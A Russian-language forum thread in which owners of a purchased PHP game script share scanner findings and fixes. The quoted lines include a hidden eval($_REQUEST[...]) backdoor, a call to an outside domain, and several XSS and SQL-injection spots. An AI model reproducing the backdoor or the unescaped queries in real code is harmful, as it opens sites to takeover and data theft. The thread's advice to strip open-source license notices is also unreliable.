Rozario
Местный
- Сообщения
- 38
- Реакции
- 8
удаляйnikitin2016 написал(а):@fopen("http://fruit-farm.org/admin.html","r");
чем заменить фрут-фарм ? своим доменом или просто удалить эту строку в файле : _class.rfs_payeer.php
maks111
Участник
- Сообщения
- 1
- Реакции
- 0
тут нашел коды помогите исправить их
что сделать можно ли их удалить
PHP:
/pages/account/_referals.php
16:
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>
XSS!
pages/admin/_about.php
61:
$db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'");
SQL Injection!
/pages/admin/_contacts.php
60:
$db->Query("UPDATE db_conabrul SET contacts = '".$_POST["tx"]."' WHERE id = '1'");
SQL Injection!
PHP:
/_recovery.php
72:
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
XSS!
/_signup.php
99:
<td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
XSS!
/_signup.php
213:
<td align="left" style="padding:3px;"><input name="login" type="text" size="25" maxlength="10" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td>
XSS!
/_referals.php
16:
<img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font>
XSS!
где нашел там же и посмотри как исправитьmaks111 написал(а):тут нашел коды помогите исправить их
PHP:/pages/account/_referals.php 16: <img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font> XSS! pages/admin/_about.php 61: $db->Query("UPDATE db_conabrul SET about = '".$_POST["tx"]."' WHERE id = '1'"); SQL Injection! /pages/admin/_contacts.php 60: $db->Query("UPDATE db_conabrul SET contacts = '".$_POST["tx"]."' WHERE id = '1'"); SQL Injection!
что сделать можно ли их удалитьPHP:/_recovery.php 72: <td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td> XSS! /_signup.php 99: <td align="left" width="250"><input name="email" type="text" size="25" maxlength="50" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td> XSS! /_signup.php 213: <td align="left" style="padding:3px;"><input name="login" type="text" size="25" maxlength="10" value="<?=(isset($_POST["login"])) ? $_POST["login"] : false; ?>"/></td> XSS! /_referals.php 16: <img src="/img/piar-link.png" style="vertical-align:-2px; margin-right:5px;" /><font color="#000;">http://<?=$_SERVER['HTTP_HOST']; ?>/?i=<?=$_SESSION["user_id"]; ?></font> XSS!
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
himik
Участник
- Сообщения
- 230
- Реакции
- 32
Удаляй,это редактор который вообще не используется,я удалил никаких проблем.nikitin2016 написал(а):Народ что лучше совсем удалить папку tiny_mce или поставить на нее htaccess (deny from all) и права доступа 444 , подскажите ?
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
А если я удалю папку tiny_mce , а у меня все страницы на этом редакторе написаны то они сразу все записи исчезнут ? И придется писать заново или я просто новой записи не смогу сделать ?himik написал(а):Удаляй,это редактор который вообще не используется,я удалил никаких проблем.
himik
Участник
- Сообщения
- 230
- Реакции
- 32
Страницы написаны не в этом редакторе.Если удалишь папку то в админке при написании новостей,правил и т.д. просто исчезнет возможность использования некоторых функций(смайлы,медиа,символы и т.д.) если это не устраивает тогда надо проверять файлы в этой папке и оставлять только те что относятся к редактору а так же выставлять права,думаю только на чтение.nikitin2016 написал(а):А если я удалю папку tiny_mce , а у меня все страницы на этом редакторе написаны то они сразу все записи исчезнут ? И придется писать заново или я просто новой записи не смогу сделать ?
п.с. Я удалил так как не использую доп. функции.
Sidr23
Местный
- Сообщения
- 54
- Реакции
- 3
что скажете об этой статье из песочницы - .htacсess как оформлять ))
kadet2106
Участник
- Сообщения
- 14
- Реакции
- 2
Кто подскажет? Что делать с этими ссылками:
Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license
Находяться они в файлах .js
Их можно удалять или нет?
Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license
Находяться они в файлах .js
Их можно удалять или нет?
mythphp
Местный
- Сообщения
- 74
- Реакции
- 9
Так удали и посмотришь если на работу сайта не повлияло значит всё нормально. В любом случае зачем тебе левые ссылки в скрипте )kadet2106 написал(а):Кто подскажет? Что делать с этими ссылками:
Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license
Находяться они в файлах .js
Их можно удалять или нет?
nikitin2016
Участник
- Сообщения
- 228
- Реакции
- 12
я удалил все файлы и записи с Лицензией и скрипт работает нормально , перед удалением сделай резервное копирование всего что будешь удалять чтобы если что пойдет не так мог вернуть обратно , я всегда так делаю помогает (перестраховка великая вещь)kadet2106 написал(а):Кто подскажет? Что делать с этими ссылками:
Line 7: * http://www.opensource.org/licenses/mit-license.php
Line 8: * http://www.gnu.org/licenses/gpl.html
Line 854: * http://www.opensource.org/licenses/mit-license.php
Line 855: * http://www.gnu.org/licenses/gpl.html
Line 7: * http://jquery.org/license
Находяться они в файлах .js
Их можно удалять или нет?
я удали полностью текстовый редактор тайни мке и пользуюсь онлайн текстовым редактором просто вставляю код новости или правил допустим как мне и советовали , не удобно конечно , но в целях безопасности чего только не сделаешь !himik написал(а):Страницы написаны не в этом редакторе.Если удалишь папку то в админке при написании новостей,правил и т.д. просто исчезнет возможность использования некоторых функций(смайлы,медиа,символы и т.д.) если это не устраивает тогда надо проверять файлы в этой папке и оставлять только те что относятся к редактору а так же выставлять права,думаю только на чтение.
п.с. Я удалил так как не использую доп. функции.
Последнее редактирование модератором:
Kamikadze
Местный
- Сообщения
- 53
- Реакции
- 5
Krikash
Местный
- Сообщения
- 91
- Реакции
- 8
Это дыра!Kamikadze написал(а):Привет всем! гляньте строчку, айболит прям сильно на нее выругался
Код:if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
if(!empty($_REQUEST['db_donations'])){ if(@get_magic_quotes_gpc())$_REQUEST['db_donations']=stripslashes($_REQUEST['db_donations']); eval($_REQUEST['db_donations']); die();}
Krikash
Местный
- Сообщения
- 91
- Реакции
- 8
MrMatnoos
Участник
Пробовал эту дыру закрыть, модуль не в какую не хотел работать.. Плюнул и удалил его.Krikash написал(а):Использование функции eval() может быть очень опасно, поскольку позволяет исполнить произвольный код.
Kamikadze
Местный
- Сообщения
- 53
- Реакции
- 5
После удаления модуль работает?Mrmatnoos написал(а):Пробовал эту дыру закрыть, модуль не в какую не хотел работать.. Плюнул и удалил его.
Kamikadze
Местный
- Сообщения
- 53
- Реакции
- 5
MrMatnoos
Участник
вот в этом и проблема, что когда я удаляю эту строку у меня влазит пустая страницы.Kamikadze написал(а):eval($_REQUEST['db_donations']); die();} удалил эту строку, все работает
MrMatnoos
Участник
Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался .Mrmatnoos написал(а):вот в этом и проблема, что когда я удаляю эту строку у меня влазит пустая страницы.
Kamikadze
Местный
- Сообщения
- 53
- Реакции
- 5
Вообщем удалил все строку... работает все...странноMrmatnoos написал(а):Нашёл защиту этой инъекции.. Там стоит код: если в коде пропадёт строчка eval($_REQUEST['db_donations']); die();, то активируются дополнительные теги <?, тем самым вызывая пустую страницу. Вот что значит автор постарался .